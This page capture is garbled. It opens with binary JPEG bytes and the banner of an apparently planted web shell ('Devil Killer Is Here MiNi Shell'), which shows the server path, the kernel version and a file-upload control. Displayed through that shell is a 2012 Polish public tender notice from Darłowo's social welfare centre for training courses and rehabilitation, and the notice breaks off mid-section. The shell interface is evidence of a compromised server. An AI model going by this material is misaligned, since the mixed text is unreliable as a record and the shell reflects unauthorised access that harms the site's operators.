JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120717/256250-N-2012.html

<p class="kh_header"><b>Darłowo: Organizacja szkoleń oraz zabiegów rehabilitacyjnych  dla osób bezrobotnych , niepracujących,bądź pracujących zagrożonych wykluczeniem społecznym w ramach  projektu systemowego  Szansa na rozwój realizowanego w 2012 roku  przez Miejski Ośrodek Pomocy Społecznej w Darłowie w 2012 roku współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</b><br>
<b>Numer ogłoszenia: 256250 - 2012; data zamieszczenia: 17.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. O.D. Tynieckiego 20, 76-150 Darłowo, woj. zachodniopomorskie, tel. 94 3146776, faks 94 3146776.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.darlowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja szkoleń oraz zabiegów rehabilitacyjnych  dla osób bezrobotnych , niepracujących,bądź pracujących zagrożonych wykluczeniem społecznym w ramach  projektu systemowego  Szansa na rozwój realizowanego w 2012 roku  przez Miejski Ośrodek Pomocy Społecznej w Darłowie w 2012 roku współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja szkoleń oraz zabiegów rehabilitacyjnych  dla osób bezrobotnych , niepracujących,bądź pracujących zagrożonych wykluczeniem społecznym w ramach  projektu systemowego  Szansa na rozwój realizowanego w 2012 roku  przez Miejski Ośrodek Pomocy Społecznej w Darłowie w 2012 roku współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówień stanowiących nie więcej niż 50% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.53.00.00-8, 80.53.30.00-9, 85.31.25.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunki , jeżeli złoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu- załącznik nr 1 do siwz.
dot. części 1 ( kurs prawa jazdy kat. C)
jeżeli Wykonawca wykaże, że posiada aktualny wpis  w rejestrze przedsiębiorstw prowadzących ośrodki szkolenia kierowców w Starostwie Powiatowym właściwym dla miejsca wykonywania działalności . Wpis musi obejmować okres realizacji zadania .</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunki , jeżeli złoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu- załącznik nr 1 do siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunki , jeżeli złoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu- załącznik nr 1 do siwz.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunki , jeżeli złoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu- załącznik nr 1 do siwz.

dot. części 1 ( prawo jazdy kat. C)
 jeżeli Wykonawca wykaże,  że dysponuje wykwalifikowaną kadrą tj. co najmniej 1  osobą- instruktorem nauki jazdy ,który posiada kwalifikacje określone w rozporządzeniu Min. Infrastruktury  z 27.10.2005 r sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów ( Dz.U.z 2005 r, Nr 217, poz. 1834 z późn. zmianami) oraz  co najmniej 2 letnie doświadczenie w realizacji przedmiotu zamówienia .

dot. części 2(szkolenia przyuczające do  zawodu)
1) jeżeli Wykonawca wykaże, że dysponuje wykwalifikowaną kadrą tj. co najmniej  1 osobą  zdolną do wykonania przedmiotu zamówienia- przeprowadzenia kursu kucharza małej gastronomii, z wykształceniem min. średnim ,posiadającą  tytuł mistrza w zawodzie kucharz z uprawnieniami pedagogicznymi oraz co najmniej 2 letnie doświadczenie w realizacji szkoleń w przedmiocie zamówienia wraz z informacja o podstawie dysponowania tą sobą - zał nr 3.
oraz
2)jeżeli Wykonawca wykaże, że dysponuje wykwalifikowaną kadrą tj. co najmniej 2 osobami zdolnymi do wykonania przedmiotu zamówienia- przeprowadzenia kursu magazyniera z obsługą wózków jezdniowych, w tym :1 osobę z   wykształceniem wyższym  o kierunku mechanicznym  z uprawnieniami pedagogicznymi  z co najmniej 2 letnim doświadczeniem w realizacji szkoleń w przedmiocie zamówienia oraz 1 osobę z wykształceniem min. średnim z uprawnieniami pedagogicznymi  oraz uprawnieniami do obsługi wózków jezdniowych oraz z co najmniej 2 letnim doświadczeniem w realizacji kursów w przedmiocie zamówienia  ,wraz z informacją o podstawie dysponowania tymi osobami - zał. nr 3.
oraz 
3) jeżeli Wykonawca wykaże, że dysponuje wykwalifikowaną kadrą tj. 1 osobą zdolną do wykonania przedmiotu zamówienia- przeprowadzenia kursu operatora koparko-ładowarki kl. III, posiadającą uprawnienia do prowadzenia szkoleń w zakresie przedmiotu zamówienia zgodnie z przepisami rozporządzenia Ministra Gospodarki z 20 września 2001 r w sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych
i drogowych ( Dz.U.Nr 118, poz. 1263) , wraz z informacją o podstawie dysponowania tą osobą- zał nr 3.

 dot. części 3(szkolenie komputerowe z kasą fiskalną)
jeżeli Wykonawca wykaże, że dysponuje wykwalifikowaną kadrą tj. co najmniej 1 osobą  zdolną do wykonania przedmiotu zamówienia- przeprowadzenia kursu obsługi komputera z kasa fiskalną , posiadającą   wykształcenie wyższe  informatyczne z uprawnieniami pedagogicznymi  oraz co najmniej 2 letnie doświadczenie w realizacji szkoleń w przedmiocie zamówienia, wraz z informacją o podstawie dysponowania tą osobą- zał nr 3.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia w/w warunki , jeżeli złoży podpisane oświadczenie o spełnianiu warunków udziału w postępowaniu- załącznik nr 1 do siwz.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>aktualne zaświadczenie o wpisie w rejestrze przedsiębiorstw prowadzących ośrodki szkolenia kierowców w Starostwie Powiatowym właściwym dla siedziby firmy .  Wpis musi obejmować okres realizacji zadania- (dot. części 1),

Formularz ofertowy z wykorzystaniem wzoru -zał nr 4 do siwz co do części 1, 3 i 4 : zał nr 5 do siwz co do części 2

Oferta w formie opisowej :
w zakresie części  1- kurs prawa jazdy kat. C oferta w formie opisowej zawierająca m. innymi  informacje dotyczące  proponowanych form dydaktycznych, miejsca prowadzenia kursu, harmonogramu  zajęć i inne informacje istotne dla realizacji przedmiotu zamówienia zgodnie z obowiązującymi przepisami 

w zakresie części 2- kursy przyuczające do zawodu)-oferta w formie opisowej zawierająca program szkolenia , w tym nazwę i formy kształcenia, czas trwania i sposób organizacji szklenia , wymagania wstępne dla uczestników szkolenia, cele kształcenia, plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar, treści kształcenia w zakresie poszczególnych zajęć edukacyjnych, wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, sposób sprawdzania efektów kształcenia -zgodnie z rozporządzeniem Ministra Edukacji i Nauki z 3 lutego 2006 r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych -.oddzielnie dla każdej części zamówienia oraz dla poszczególnych kursów ujętych w części 2.
w zakresie  części 3- kurs obsługi komputera- oferta w formie opisowej zawierająca program szkolenia , w tym nazwę i formy kształcenia, czas trwania i sposób organizacji szklenia , wymagania dla uczestników szkolenia, cele kształcenia, plan nauczania określający nazwę zajęć edukacyjnych oraz ich wymiar, treści kształcenia w zakresie poszczególnych zajęć edukacyjnych, wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych, sposób sprawdzania efektów kształcenia -zgodnie z rozporządzeniem z 3 lutego 2006 r w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych.

w zakresie części 4- zabiegi rehabilitacyjne   - oferta w formie opisowej  zawierająca m. innymi  informacje dotyczące miejsca realizacji zabiegów rehabilitacyjnych, rodzaju wykonywanych zabiegów,  dowozu uczestników zabiegów, wstępnego harmonogramu realizacji zamówienia  i inne informacje istotne dla realizacji przedmiotu zamówienia 


Certyfikat lub inny dokument potwierdzający, że Wykonawca posiada uprawnienia do prowadzenia    
             kursów oraz wydawania zaświadczeń w zakresie kursu wózki jezdniowe z wymiana butli gazowych-   
             dot.  części 2 ,

Potwierdzenie Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego w Warszawie spełniania przez     Wykonawcę wymagań określonych w § 25 rozporządzenia Ministra Gospodarki z 20 września 2001 r w   sprawie bezpieczeństwa i higieny pracy podczas eksploatacji maszyn i innych urządzeń technicznych do robót ziemnych, budowlanych i drogowych - dot. części 2.

Dokument( np. pełnomocnictwo, umowa spółki cywilnej, odpis z KRS)potwierdzający, iż oferta została podpisana przez osoby uprawnione do reprezentowania Wykonawcy, jeżeli nie wynika to z innych dokumentów dołączonych do oferty.

posiadanie wpisu  do rejestru wojewody ośrodków, w których mogą odbywać się turnusy rehabilitacyjne    
         i uprawniony jest do przyjmowania zorganizowanych grup turnusowych ( dot. części 4).

Inne dokumenty ,które Wykonawcy mogą dołączyć do oferty mające wpływ na kryteria oceny oferty
1)	Certyfikat systemu zarządzania jakością ISO, jeżeli Wykonawca posiada,
2)	Akredytację kuratora oświaty  i wychowania  właściwego dla siedziby placówki na realizację kursów  zawodowych, jeżeli Wykonawca posiada
3)	Posiadanie wpisu do ewidencji szkół i placówek niepublicznych-placówek kształcenia ustawicznego   prowadzonego przez organ samorządu terytorialnego właściwego dla siedziby placówki, jeżeli Wykonawca posiada</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy  w stosunku do treści oferty 
    polegającej na :
a.)	Przesunięciu terminu realizacji zamówienia z powodu przedłużającej się procedury wyboru najkorzystniejszej oferty lub złożenia odwołania lub w sytuacjach losowych uniemożliwiających realizację przedmiotu zamówienia w zakładanym terminie,
b.)	zmianie wynagrodzenia Wykonawcy w sytuacji  konieczności zmniejszenia lub zwiększenia ilości osób (uczestników szkolenia),  
c.)	zwiększenia zakresu usług w sytuacji konieczności przyznania dodatkowego wsparcia uczestnikom szkolenia.
2)Przyczyną zmiany warunków umowy może być również  zmiana powszechnie obowiązujących przepisów 
    prawa w zakresie  mającym wpływ na realizację przedmiotu zamówienia.
3)Zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru  
     Wykonawcy jest możliwa, jeżeli konieczność wprowadzenia zmian wynika z okoliczności, których nie 
     można było przewidzieć w chwili zawarcia umowy, lub zmiany są korzystne dla Zamawiającego. 
4)Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie w drodze aneksu do 
    umowy , nie naruszając ustawy PZP.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.darlowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. O.D. Tynieckiego 20 
76-150 Darłowo
tel/ fax: 314-67-76.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.07.2012 godzina 08:45, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. O.D. Tynieckiego 20 
76-150 Darłowo
tel/ fax: 314-67-76
pok nr 12.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy pn.  Szansa na rozwój realizowany przez Miejski Ośrodek Pomocy Społecznej w Darłowie współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> przeprowadzenie kursu prawa jazdy kat. C dla 3 osób.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres merytoryczny kursu
	Zgodnie z zgodnie z obowiązującymi  w tym zakresie przepisami rozporządzenia Ministra Infrastruktury z 27.10.2005 r. w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami , instruktorów i egzaminatorów (Dz.U. z 2005 r., Nr 217, poz. 1834 z późn. zmianami). 
Miejsce realizacji kursu	Część teoretyczna i praktyczna -Koszalin, 
Wykonawca zapewnia  dojazd na szkolenie z  części teoretycznej  z Darłowa do Koszalina i powrót.
Planowana liczba osób do przeszkolenia	        3 osoby
Liczba godzin	Zgodnie z obowiązującymi przepisami 
Termin realizacji	sierpień- 15 grudzień 2012 r
Obowiązki Wykonawcy	Wykonawca zapewnia:
1)	niezbędne materiały szkoleniowe,
2)	ubezpieczenie NNW,
3)	badanie lekarskie,
4)	opłacenie pierwszego egzaminu teoretycznego i praktycznego w WORD,
5)	catering( woda mineralna, kawa, herbata, 2 rodzaje ciastek) w trakcie każdych zajęć teoretycznych 
6)	realizację kursu zgodnie z przedstawionym i zaakceptowanym przez Zamawiającego harmonogramem zajęć.
7)	 kadrę  spełniającą wymogi określone przepisami    
8)	dostarczenie Zamawiającemu pełnej dokumentacji przeprowadzonego kursu tj. kserokopii ,  kart przeprowadzonych zajęć teoretycznych i praktycznych z wymiarem godzin, list obecności, potwierdzenia odbioru materiałów szkoleniowych, potwierdzenia korzystania z cateringu, zaświadczeń dot. zdanego egzaminu wewnętrznego  , zdjęcia dokumentujące przebieg kursu.
płatność	1)	Pierwsza transza- po zakończeniu części teoretycznej kursu  i po przedstawieniu wyników wewnętrznego egzaminu teoretycznego. Płatność obejmować będzie  wydatki Wykonawcy poniesione na realizację zadania w okresie od jego rozpoczęcia do zakończenia wewnętrznego egzaminu teoretycznego
2)	Druga transza-po zakończeniu kursu i przystąpieniu wszystkich uczestników do pierwszego egzaminu teoretycznego i praktycznego WORD, obejmować będzie pozostałe wydatki.
Dokumenty dla uczestników	Zaświadczenie o ukończeniu kursu
Pozostałe wymagania	1)	Oznaczenie pomieszczenia , w którym prowadzone będą zajęcia, materiałów szkoleniowych orz pozostałej dokumentacji zgodnie z wytycznymi dot. oznaczania projektów w ramach POKL- logotypy do pobrania na stronie: www.pokl-darlowo.pl 
2)	Bieżące  informowanie Zamawiającego o nieobecnościach  beneficjentów na zajęciach, przypadkach rezygnacji z kursu, itp.
3)	niezwłoczne pisemne poinformowanie Zamawiającego o zmianie osoby prowadzącej szkolenie z podaniem przyczyny zmiany oraz danych nowej osoby. Zmiana osoby prowadzącej szkolenie nie może skutkować pogorszeniem poziomu szkolenia. Wykonawca jest zobowiązany zapewnić kontynuację szkolenia przez osobę posiadającą wymagane kwalifikacje i doświadczenie gwarantujące nie gorszy poziom szkolenia niż osoba pierwotnie wskazana. Wykonawca musi uzyskać akceptację Zamawiającego na powyższą zmianę,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> kursy przyuczające do zawodu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rodzaj kursu
	1.kurs -kucharz małej gastronomii-dla 5 osób
2.kurs- magazynier z obsługą wózków jezdniowych  dla 7 osób
3.kurs - operatora koparko-ładowarki klasy III dla 2 osób

Powyższe kursy  będą realizowane w formie kształcenia ustawicznego w formach pozaszkolnych zgodnie z rozporządzeniem Min. Edukacji i Nauki z 3 lutego 2006 r w sprawie uzyskiwania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych ( Dz.U.Nr 31, poz. 216 z 2006 r)

Zakres merytoryczny kursów	Kurs- kucharz małej gastronomii: 
